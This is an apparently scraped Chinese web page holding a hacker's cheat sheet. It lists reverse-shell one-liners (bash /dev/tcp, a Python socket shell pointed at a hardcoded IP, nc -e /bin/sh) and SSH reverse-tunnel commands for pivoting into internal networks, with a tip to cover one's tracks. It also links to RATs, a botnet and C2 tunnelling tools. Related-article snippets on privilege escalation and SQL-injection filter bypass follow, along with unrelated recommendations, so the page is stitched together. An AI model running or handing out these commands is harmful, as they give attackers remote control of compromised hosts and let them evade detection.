bash -i >& /dev/tcp/ip/3333 0>&1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc -e /bin/sh ip 3333
python -c 'import pty; pty.spawn("/bin/bash")' https://www.freebuf.com/news/142195.html reGeorgSocksProxy.py -p 9999 -u 木马 ssh -f -N -D ip:7070 xss@172.30.0.2 ssh -CfNg -D 7001 root@172.30.0.2 -p 22
A是vps主机,B,C 是内网
B: ssh -p 22 -qngfNTR "*:7777:localhost:22" root@A的vps
A主机的sshd配置文件/etc/ssh/sshd_config添加:GatewayPorts yes 在C主机上面运行:
C: ssh -p 7777 -qngfNTD 8888 root@A的vps
然后输入B主机的ssh密码,此时就可以以C主机的8888端口作为socks5代理来进入B的内网 不想输入密码可以用私钥,注意擦屁股。 http://www.ttlsa.com/linux/linux-setup-socks-5-ttlsa/ https://github.com/vzex/dog-tunnel 狗洞
https://github.com/SECFORCE/Tunna Tunna是一组将包裹和隧道通过HTTP任何TCP通信工具。它可用于绕过在充分防火墙环境中的网络的限制。
https://github.com/ahhh/Reverse_DNS_Shell 使用DNS作为C2通道蟒蛇反向壳
https://github.com/subTee/PoshRat PowerShell的反向HTTPs的壳
https://github.com/inquisb/icmpsh 简单的反向ICMP外壳
https://github.com/ring04h/rtcp2udp 反向TCP端口UDP转发工具
https://github.com/gentry0520/udptunnel 稳定的UDP反向端口映射方法
https://github.com/RicterZ/reprocks 一个Python socks5代理服务器/客户端
https://github.com/T3rry7f/tulua HTTP隧道的TCP连接
https://github.com/sweetsoftware/Ares Python的僵尸网络以及后门 战神是一个Python远程访问工具。
https://github.com/sailro/Bdtunnel BoutDuTunnel能够创建在HTTP请求隧道虚拟连接。
https://github.com/n1nj4sec/pupy Pupy是一个开源,跨平台(Windows,Linux和OSX,Android版),多功能RAT(远程管理工具
https://github.com/funkandwagnalls/ranger一个工具,支持安全专家的访问和远程基于Microsoft Windows的系统进行交互

  

提权AND反弹OR转发的更多相关文章

  1. LINUX下使用NC反弹CMDSHELL提权

    很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11. ...

  2. NC反弹CMDSHELL提权总结

    Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上 ...

  3. ssh远程端口转发&&windows系统提权之信息收集&&网安工具分享(部分)

    一.ssh远程端口转发 背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发 1.网络拓扑图 假设获取的服务器为web服务器,we ...

  4. webshell提权20种思路

    1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接 ...

  5. WIN提权总结【本地存档-转载】

    [ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...

  6. 记一次FileZillaServer提权

    前段时间检测一个企业网站,在检测该企业的一个下属公司的网站时通过用户名admin和密码123456进入了后台,后台目录就是公司汉语拼音+admin,诸如xxxadmin这种形式的.在后台通过“产品图片 ...

  7. 暴破助攻提权:ruadmin

    i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路 ...

  8. 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

    本文作者:i春秋签约作家——酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而 ...

  9. 滥用DNSAdmins权限进行Active Directory提权

      0x00 前言 除了在实现自己的DNS服务器功能之外,Microsoft还为该服务器实现自己的管理协议以便于管理与Active Directory域集成.默认情况下,域控制器也是DNS服务器; 大 ...

随机推荐

  1. 带你走进MySQL全新高可用解决方案-MGR

    ​一.初识MGR 相信很多人对MGR这个词比较陌生,其实MGR(全称 MySQL Group Replication [MySQL 组复制])是Oracle MySQL于2016年12月发布MySQL ...

  2. 关于通用Mapper new Example使用记录

    关于通用MapperExample使用记录 环境准备 需要集成 mybatis 的 generator 插件,方便自动生成 实体类和 mapper 类,还可以生成xml,不过一般我们都不用 xml b ...

  3. VSCode添加某个插件后,Python 运行时出现Segmentation fault (core dumped) 解决办法

    在VSCode添加某个插件后,Debug出现Segmentation fault (core dumped) 解决方案,在当前environment下运行: conda update --all

  4. VS Code 1.60 发布!竟然可以自动检测编程语言了!

    北京时间 2021 年 9 月 3 日凌晨,微软正式发布 2021 年 8 月版的 Visual Studio Code.希望您会喜欢此版本中的许多更新与改进,以下是其中的一些亮点: * 自动语言检测 ...

  5. 174道 JavaScript 面试题,助你查漏补缺

    最近在整理 JavaScript 的时候发现遇到了很多面试中常见的面试题,本部分主要是作者在 Github 等各大论坛收录的 JavaScript 相关知识和一些相关面试题时所做的笔记,分享这份总结给 ...

  6. 假期作业03:使用IDE开发你的Java程序

    假期作业03:使用IDE开发你的Java程序 一.使用Eclipse创建一个Java项目HelloWorldPrj,编写一个Java程序并运行. 首先要下载eclipse. (注意这里要选一个中国的, ...

  7. 微信小程序基础知识笔记

    微信小程序笔记 文件构成 全局文件 app.json 小程序全局配置文件,必要,自动生成 app.js 小程序入口JS文件,一般只需申明全局变量.处理生命周期以及版本升级即可,必要 app.wxss ...

  8. Pycharm去除波浪线等相关操作

  9. Gitlab - 安装的社区版 Gitlab-ce,解决访问网页报502-Whoops, GitLab is taking too much time to respond的问题

    问题背景 在自己虚拟机(centos7)上装了 Gitlab-ce,就是社区版的 Gitlab,版本是 13.0+ 问题描述 浏览器访问 Gitlab 网站,报 502 问题翻译 502-Whoops ...

  10. 记录一次sql注入绕过

    目标:http://www.xxxxx.net/temp.asp?ID=10359 通过 and 1=1 and 1=2 测试发现存在拦截 首先想到 and 空格 = 可能存在触发规则 一般遇到这种情 ...